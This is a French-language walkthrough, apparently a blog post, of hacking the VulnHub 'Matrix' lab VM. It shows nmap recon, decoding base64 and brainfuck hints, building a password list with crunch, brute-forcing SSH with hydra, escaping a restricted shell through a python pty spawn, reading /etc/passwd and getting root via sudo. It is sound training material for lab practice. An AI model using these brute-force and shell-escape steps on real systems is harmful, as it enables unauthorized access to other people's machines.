2019/01/26 :
Une nouvelle VM de chez vulnhub.com :
le lien ici :
ariokio@GB-BXBT-1900:~/Documents/VM/vulnhub$ wget https://download.vulnhub.com/matrix/Machine_Matrix.zip
=============
En premier un recon du réseau avec mon script :
root@aridebsec:~/Documents# ./all_live_hosts.sh 10.0.1.0/24
xx-xxx-2 (10.0.1.1)
attacker (10.0.1.41)
porteus (10.0.1.72) : la victime ?
=============
Un scan nmap pour identifier les ports et services de la machine :
# Nmap 7.70 scan initiated Sat Jan 26 18:23:48 2019 as: nmap -sC -sV -A -oA Matrix_nmap 10.0.1.72
Nmap scan report for porteus (10.0.1.72)
Host is up (0.0022s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.16 ms porteus (10.0.1.72)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 26 18:24:24 2019 — 1 IP address (1 host up) scanned in 37.18 seconds
Donc on a le port 22, 80, 31337, le dernier est une commande python SimpleHTTPServer… On dirait
On va voir le port 80 et le port 31337 via un navigateur.
Le port 80 ouvre un site avec un compteur, mais le compteur ne défile pas. Rien dans le code source.
Une page un peu différente pour le port 31337 : cette fois dans le code source on a :
b
Cypher
« You know.. I know this steak doesn’t exist. I know when I put it in my mouth; the Matrix is telling my brain that it is juicy, and delicious. After nine years.. you know what I realize? Ignorance is bliss. »
</div>
</div>
<!– service –>
<!– End / service –>
Tiens tiens :
un petit coup de decode base64 (qui ne tente rien n’a rien) :
root@aridebsec:~/Documents/Matrix_vulnhub# echo « ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= » | base64 -d
echo « Then you’ll see, that it is not the spoon that bends, it is only yourself. » > Cypher.matrix
Ok mais ça veut dire quoi ça ????? Ok après quelques minutes de réflexion : et si on ajoutait ça dansl’URL… 😉
La on va downloader un fichier… Cool allons-y…
root@aridebsec:~/Documents/Matrix_vulnhub# file Cypher.matrix
Cypher.matrix: ASCII text
root@aridebsec:~/Documents/Matrix_vulnhub# stat Cypher.matrix
File: Cypher.matrix
Size: 4121 Blocks: 16 IO Block: 4096 regular file
Device: 801h/2049d Inode: 2228603 Links: 1
Access: (0644/-rw-r–r–) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2019-01-26 18:52:33.341345750 -0500
Modify: 2019-01-26 18:51:31.485346015 -0500
Change: 2019-01-26 18:51:46.401345951 -0500
Birth: –
Rien de particulier c’est un fichier ASCII.
On l’ouvre et on a un fichier de type brainfuck contenant : (extrait) :
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->– -<]>- —.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->— —– -<]>- –.<+ +++++ +++[- >++++ +++++ <]>++
.+.– .—- —– .++++ +.— —-. <++++ ++++[ ->— —– <]>– —–
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. —– —-. <++++ ++++[
->— —– <]>– —-. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->— <]>– —-. <++++ [->++ ++<]> ++..+ +++.- —– –.++ +.<++
+[->- –<]> —– .<+++ ++++[ ->— —-< ]>— –.<+ ++++[ ->— –<]>
—– —.- –.<
On va sur le site : https://www.dcode.fr/brainfuck-language
Qui nous traduit le code en :
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
Ok, donc a on : du SSH, du HTTP, on a un port 31337 qui nous donnes accès à un fichier qui une fois télécharger et decoder nous donne
un user « guest » et une partie d’un mot de passe… Well well… Comme le dit le texte il manque deux carractères dans le mot de passe.
On va se creer un dictionnaire potentiel en complétant les deux carractères via l’outil crewl (déjà utiliser dans le challenge de la
machine MrRobot) :
root@aridebsec:~/Documents/Matrix_vulnhub# crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
Ensuite et bien vu que le HTTP ne donne rien on va sur le port 22 et on tente le coup :
root@aridebsec:~/Documents/Matrix_vulnhub# hydra -l guest -P dict.txt 10.0.1.72 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-01-26 19:12:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://10.0.1.72:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 84 to do in 00:01h, 16 active
[22][ssh] host: 10.0.1.72 login: guest password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-01-26 19:13:14
root@aridebsec:~/Documents/Matrix_vulnhub#
Donc on a un user et un mot de passe :
guest : k1ll0r7n
connexion SSH donc sur la victime :
root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72
The authenticity of host ‘10.0.1.72 (10.0.1.72)’ can’t be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘10.0.1.72’ (ECDSA) to the list of known hosts.
guest@10.0.1.72’s password:
Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/’ in command names
guest@porteus:~$ ls -l
-rbash: /bin/ls: restricted: cannot specify `/’ in command names
guest@porteus:~$ ll
-rbash: /bin/ls: restricted: cannot specify `/’ in command names
guest@porteus:~$ cd
-rbash: cd: restricted
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/’ in command names
guest@porteus:~$
Ok, ok…
en faisant une tabulation :
guest@porteus:~$
! bg command dirs enable fc help let mcedit readonly suspend type vi
./ bind compgen disown esac fg history ll popd return test typeset wait
: break complete do eval fi if local printf select then ulimit while
[ builtin compopt done exec for in logout pushd set time umask {
[[ caller continue echo exit function jobs ls pwd shift times unalias }
]] case coproc elif export getopts kill mapfile read shopt trap unset
alias cd declare else false hash la mc readarray source true until
guest@porteus:~$ echo $PATH
/home/guest/prog
guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi
guest@porteus:~$ echo $SHELL
/bin/rbash
guest@porteus:~$
Mais fuck quoi ce shell restreint….
Merci Gotmilk :
root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72 « export TERM=xterm; python -c ‘import pty; pty.spawn(\ »/bin/bash\ »)' »
guest@10.0.1.72’s password:
guest@porteus:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/lib/gdm:/sbin/nologin
oprofile:x:51:51:oprofile:/:/bin/false
usbmux:x:52:83:User for usbmux daemon:/var/empty:/bin/false
sddm:x:64:64:User for SDDM:/var/empty:/bin/false
pulse:x:65:65:User for PulseAudio:/var/run/pulse:/bin/false
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
guest:x:1000:100:,,,:/home/guest:/bin/rbash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
colord:x:72:72:Color Daemon Owner:/var/lib/colord:/bin/false
polkitd:x:28:28:PolicyKit Daemon Owner:/etc/polkit-1:/bin/false
trinity:x:1001:1001::/home/trinity:/bin/bash
guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
(ALL) ALL
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp
guest@porteus:~$ sudo /bin/bash
sudo /bin/bash
Password:
There’s a lot of it about, you know.
Password:
Ying Tong Iddle I Po
Password: k1ll0r7n
root@porteus:/home/guest#
root@porteus:/home/guest# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest#
Game over !!!!! Je suis root
root@porteus:/home/guest# ls
ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ prog/
root@porteus:/home/guest# cd
cd
root@porteus:~# ls
ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt
root@porteus:~# cat flag .txt
cat flag.txt
_,-.
,-‘ _| EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_. IN THE MATRIX AND BEAT OFF
|`-._`-.\,-‘_| _,-‘.
`-.|.-‘ | |`.-‘|_ WHAT
| |_|,-‘_`.
|-._,-‘ | NO, ME NEITHER
jrei | | _,’
‘-|_,-‘ IT’S JUST A HYPOTHETICAL QUESTION